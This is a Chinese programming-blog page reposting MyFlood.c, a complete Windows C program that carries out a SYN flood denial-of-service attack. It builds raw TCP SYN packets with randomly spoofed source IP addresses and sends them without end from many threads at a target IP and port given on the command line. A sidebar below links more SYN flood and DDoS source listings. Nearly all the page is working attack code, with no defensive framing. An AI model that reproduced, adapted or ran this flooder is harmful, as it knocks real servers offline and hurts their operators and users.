源码

最新推荐文章于 2024-07-01 16:13:37 发布
最新推荐文章于 2024-07-01 16:13:37 发布
阅读量407 收藏
点赞数
分类专栏: Network Security 文章标签: header socket tcp struct buffer null 
/
//Filename:MyFlood.c
//Author:yunshu
//Write:2004-09-15
//Thanks EnvyMask,WinEggDrop
//Modify:2004-09-23
/
#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>

#pragma	comment(lib,"ws2_32.lib")
#define	PacketNum 1024


//全局变量


int		MaxThread; //最大线程数量
int		CurrentThread = 0; //当前活动线成数量
char	SendBuff[PacketNum][60] = {0}; //1024个数据包,每个的长度就是IpHeader+TcpHeader
SOCKADDR_IN	Sin;
SOCKET	SendSocket;

typedef struct ip_hdr
{
    unsigned char	h_verlen; //4位首部长度,4位IP版本号
    unsigned char 	tos; //8位服务类型TOS
    unsigned short 	total_len; //16位总长度(字节)
    unsigned short 	ident; //16位标识
    unsigned short 	frag_and_flags; //3位标志位
    unsigned char 	ttl; //8位生存时间 TTL
    unsigned char 	proto; //8位协议 (TCP, UDP 或其他)
    unsigned short 	checksum; //16位IP首部校验和
    unsigned int 	sourceIP; //32位源IP地址
    unsigned int 	destIP; //32位目的IP地址
}IP_HEADER;

typedef struct tcp_hdr //定义TCP首部
{
    USHORT 		th_sport; //16位源端口
    USHORT 		th_dport; //16位目的端口
    unsigned int	th_seq; //32位序列号
    unsigned int	th_ack; //32位确认号
    unsigned char	th_lenres; //4位首部长度/6位保留字
    unsigned char 	th_flag; //6位标志位
    USHORT 		th_win; //16位窗口大小
    USHORT		th_sum; //16位校验和
    USHORT		th_urp; //16位紧急数据偏移量
}TCP_HEADER;

typedef struct tsd_hdr //定义TCP伪首部
{
    unsigned long	saddr; //源地址
    unsigned long 	daddr; //目的地址
    char 	mbz;
    char 	ptcl; //协议类型
    unsigned short 	tcpl; //TCP长度
}PSD_HEADER;


//函数原形


int             setup(char * , char *);	//生成数据包
DWORD WINAPI    send_packet(LPVOID); //发送数据函数
USHORT          checksum(USHORT *, int); //计算检验和函数
void            watchthread(void); //检测当前线程数量


//main函数


int	main(int argc, char *argv[])
{
	WSADATA	WSAData;
	DWORD	ThreadID = 1;
	HANDLE	ThreadHandle = NULL;

	if ( argc != 4 )
	{
   		printf( "\n%s\t<TargetIP>\t<TargetPort>\t<MaxThread>\n", argv[0] );
		return -1;
   	}

   	if ( WSAStartup(MAKEWORD(2, 2), &WSAData) != 0 )
   	{
   		printf( "初始化WSAStartu失败\n" );
		return -1;
   	}

   	if ( atoi(argv[3]) > 0 && atoi(argv[3]) < 150 )
   	{
   		MaxThread = atoi(argv[3]);
   	}
   	else
   	{
		printf( "最大线程数量错误,必须大于0且小于150" );
		return -1;
   	}

   	//初始化数据包,储存到数组当中。
   	if( setup(argv[1] , argv[2]) == 1 )
   	{
   		printf( "初始化完成\n" );
   	}
   	else
   	{
		printf( "初始化失败\n" );
		return -1;
	}

	printf( "攻击开始...\n" );

   	while (1)
   	{
   		ThreadID = 1;

		for ( int Tmp = 0 ; Tmp < PacketNum ; Tmp++ )
		{
			watchthread();
			ThreadID++;

			ThreadHandle =	CreateThread(NULL, 0, send_packet, (LPVOID) Tmp, 0, &ThreadID);

		 	if ( ThreadHandle != NULL )
		 	{
		 		
				CurrentThread++;
		 	 	CloseHandle( ThreadHandle );
			}
	  	}
   	}
	closesocket(SendSocket);
   	WSACleanup();
   	return 1;
}


//名字:setup
//描述:进行初始设置,计算特定ip,特定端口,特定tcp序列号的检验和,生成数据包
//参数:目的ip地址,目的端口
//目的:提高syn数据包发送速度


int setup( char *DestIp , char *DestPort)
{
	char         src_ip[20] = {0};//源IP
   	USHORT		src_port;//源端口
   	char			dst_ip[20] = {0};//目的IP
   	USHORT		dst_port;//目的端口
   	IP_HEADER    IpHeader;
   	TCP_HEADER   TcpHeader;
   	PSD_HEADER   PsdHeader;

   	if ( strlen(DestIp) >= 16 )
   	{
	   	printf( "目的IP不对\n" );
	   	return -1;
   	}
   	strcpy( dst_ip , DestIp );

   	if ( atoi(DestPort) < 0 || atoi(DestPort) > 65535 )
   	{
	   	printf( "目的端口不对\n" );
	   	return -1;
   	}

   	Sin.sin_family = AF_INET;
   	Sin.sin_port = atoi(DestPort);
   	Sin.sin_addr.s_addr = inet_addr(dst_ip);

   	srand((unsigned) time(NULL));

   	for ( int n = 0; n < PacketNum; n++ )
   	{
   		wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );

	   	//填充IP首部
	   	IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned long));
	   	IpHeader.tos = 0;
	   	IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
	   	IpHeader.ident = 1;
	   	IpHeader.frag_and_flags = 0x40;
	   	IpHeader.ttl = 128;
	   	IpHeader.proto = IPPROTO_TCP;
	   	IpHeader.checksum = 0;
	   	IpHeader.sourceIP = inet_addr(src_ip);
	   	IpHeader.destIP = inet_addr(dst_ip);

	   	//填充TCP首部
	   	TcpHeader.th_sport = htons( rand()%60000 + 1 ); //源端口号
	   	TcpHeader.th_dport = htons( atoi(DestPort) );
	   	TcpHeader.th_seq = htonl( rand()%900000000 + 1 );
	   	TcpHeader.th_ack = 0;
	   	TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
	   	TcpHeader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
	   	TcpHeader.th_win = htons(512);
	   	TcpHeader.th_sum = 0;
	   	TcpHeader.th_urp = 0;

	   	PsdHeader.saddr = IpHeader.sourceIP;
	   	PsdHeader.daddr = IpHeader.destIP;
	   	PsdHeader.mbz = 0;
	   	PsdHeader.ptcl = IPPROTO_TCP;
	   	PsdHeader.tcpl = htons(sizeof(TcpHeader));

	   	//计算TCP校验和
	   	memcpy( SendBuff[n], &PsdHeader, sizeof(PsdHeader) );
	   	memcpy( SendBuff[n] + sizeof(PsdHeader), &TcpHeader, sizeof(TcpHeader) );
	   	TcpHeader.th_sum = checksum( (USHORT *) SendBuff[n], sizeof(PsdHeader) + sizeof(TcpHeader) );

	   	//计算IP检验和
	   	memcpy( SendBuff[n], &IpHeader, sizeof(IpHeader) );
	   	memcpy( SendBuff[n] + sizeof(IpHeader), &TcpHeader, sizeof(TcpHeader) );
	   	memset( SendBuff[n] + sizeof(IpHeader) + sizeof(TcpHeader), 0, 4 );
	   	IpHeader.checksum = checksum( (USHORT *) SendBuff, sizeof(IpHeader) + sizeof(TcpHeader) );

	   	memcpy( SendBuff[n], &IpHeader, sizeof(IpHeader) );
	   	memcpy( SendBuff[n]+sizeof(IpHeader), &TcpHeader, sizeof(TcpHeader) );
   	}

	BOOL	Flag;
   	int     Timeout;

   	//建立原生数据socket
   	/*if ( (SendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET )
   	{
		CurrentThread--;
	  	return 0;
   	}*/

	SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
	if( SendSocket == INVALID_SOCKET )
	{
		return 0;
	}

   	//设置自己填充数据包
   	Flag = TRUE;
   	if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
   	{
   		printf("Setsockopt发生错误\n");
	  	return 0;
   	}
   	//设置超时时间
   	Timeout = 1000;
   	if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
   	{
   		return 0;
   	}

   	return 1;
}


//名字:send_packet
//描述:向目标主机发送syn数据包


DWORD	WINAPI	send_packet(LPVOID LP)
{
   	//发送数据包
	int     Tmp = (int)LP;
   	int		Ret,Count = 0;

	while(TRUE)
	{
		Ret = sendto(SendSocket, SendBuff[Tmp], sizeof(IP_HEADER) + sizeof(TCP_HEADER), 0, (struct sockaddr *) &Sin, sizeof(Sin));

   		if( Ret != SOCKET_ERROR )
		{
			Count ++;
			if( Count == 10240 )
			{
				printf( "." );
				Count = 0;
				//break;
			}
			/*
			else
			{
				Ret = sendto(SendSocket, SendBuff[Tmp], sizeof(IP_HEADER) + sizeof(ICMP_HEADER), 0, (struct sockaddr *) &Sin, sizeof(Sin));
			}
   			*/
		}
		else break;
	}
	CurrentThread --;
	return 1;
}


//函数:WatchThread
//描述:检测当前线程数量,如果大于等于最大线程数量则休眠0.1秒等待其他线程退出
//返回值:无


void	watchthread()
{
	for ( ; ; )
   	{
   		if ( CurrentThread >= MaxThread )
	  	{
	  		Sleep(100);
	  	}
	  	else break;
   	}
}

///
//函数:CheckSum
//描述:计算检验和
//返回:返回检验和
///

USHORT	checksum(USHORT * buffer, int size)
{
	unsigned	long	cksum = 0;

   	while (size > 1)
   	{
		cksum += *buffer++;
	  	size -= sizeof(USHORT);
   	}
   	if (size)
   	{
		cksum += *(UCHAR *) buffer;
   	}
   	cksum = (cksum >> 16) + (cksum & 0xffff);
   	cksum += (cksum >> 16);

   	return (USHORT) (~cksum);
}


ll2323001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络编程】SYN Flood (SYN洪水攻击) 源代码分析
jiange_zh的博客
01-01 2万+
一.原理1、TCP握手协议第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包
syn攻击vc++源码
02-24
syn攻击 vc++ 源码,visual studio新建控制台程序编译即可
VC++实现多线程ddos
尹成的技术博客
03-29 3344
#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum,maxthread,port;char *DestIP;//目标IPvoid display(void)  // 定义状态提示函数 {  static int play=0;// 进度条 cha
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒 -2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,并处于崩溃状态,这种情况我们称之为:服务器端受到了SYN Flood攻击(SYN洪泛)。
SYN洪水C++代码
zhihu008的专栏
09-12 3489
SYN洪水C++代码 源码别人的 编译的时候有很多错误,自己修正了一下,改成这样了 头文件 tsf.h //头文件 #include #include #pragma comment(lib,"WS2_32.LIB") #include #include ///////////////////////////////////////////////////////////
ThreadLocal源码解析
爪哇缪斯的博客
05-26 3080
ThreadLocal源码解析
仿东郊到家源码教程
热门推荐
qq_27396589的博客
07-01 5万+
适配所有上门服务,部署直接运营
游戏源码游戏源码游戏源码游戏源码
03-27
游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码游戏源码...
java源码包---java 源码 大量 实例
04-18
Applet钢琴模拟程序java源码 2个目标文件,提供基本的音乐编辑功能。编辑音乐软件的朋友,这款实例会对你有所帮助。 Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来模拟银行ATM...
物联网项目源码 物联网项目源码
05-06
物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码物联网项目源码...
OSA-SKURWYSYN
03-09
OSA-SKURWYSYN
P2P金融借贷项目--源码+MySQL数据库_
10-19
在这个项目中,源码是实现P2P借贷平台功能的核心部分,而MySQL数据库则是用来存储和管理所有借贷相关的数据。 源码是程序员用编程语言编写的程序代码,它包含了处理用户注册、身份验证、发布借款标、投标、资金托管...
人脸识别开发包(免费,可商用,有演示、范例、说明书)完整项目实例源码
03-03
这个开发包提供了完整的项目实例源码,方便开发者进行二次开发。下面将详细解释这个开发包中的各个组件和可能涉及的知识点: 1. **SunLightData.dll**:这是一个动态链接库文件,通常包含了人脸识别算法的核心功能...
syn攻击源代码
atceedsun的专栏
03-06 2468
一、linux下源代码实现 /* syn flood by wqfhenanxc.  * random soruce ip and random sourec port.  * use #include instead of for my own system reason.  * usage :eg. to flood port 8080 on ip 246.245.167.45  
SYN Flood 工具源码
starshift的专栏
09-06 1663
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include u_int16_t  srcport; struct pseudohdr
syn flood源码
wzx19840423的专栏
03-10 2697
#include #include #include #include #include #include #include #include #include #include #include #include #include #include /* 最多线程数 */ #define MAXCHILD 128 /* 原始套接字 */ int sockfd;
时序预测-基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量
最新发布
08-30
时序预测|基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL 时序预测|基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL
206套成品网站源码打包下载
这些源码可用于快速构建和定制网站,对于开发者和站长来说是宝贵的参考资料库。" 在IT行业中,网站源码是构建网页和网络应用的基础,不同的编程语言适用于不同的开发需求和场景。此资源包括了asp、php、asp.net和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值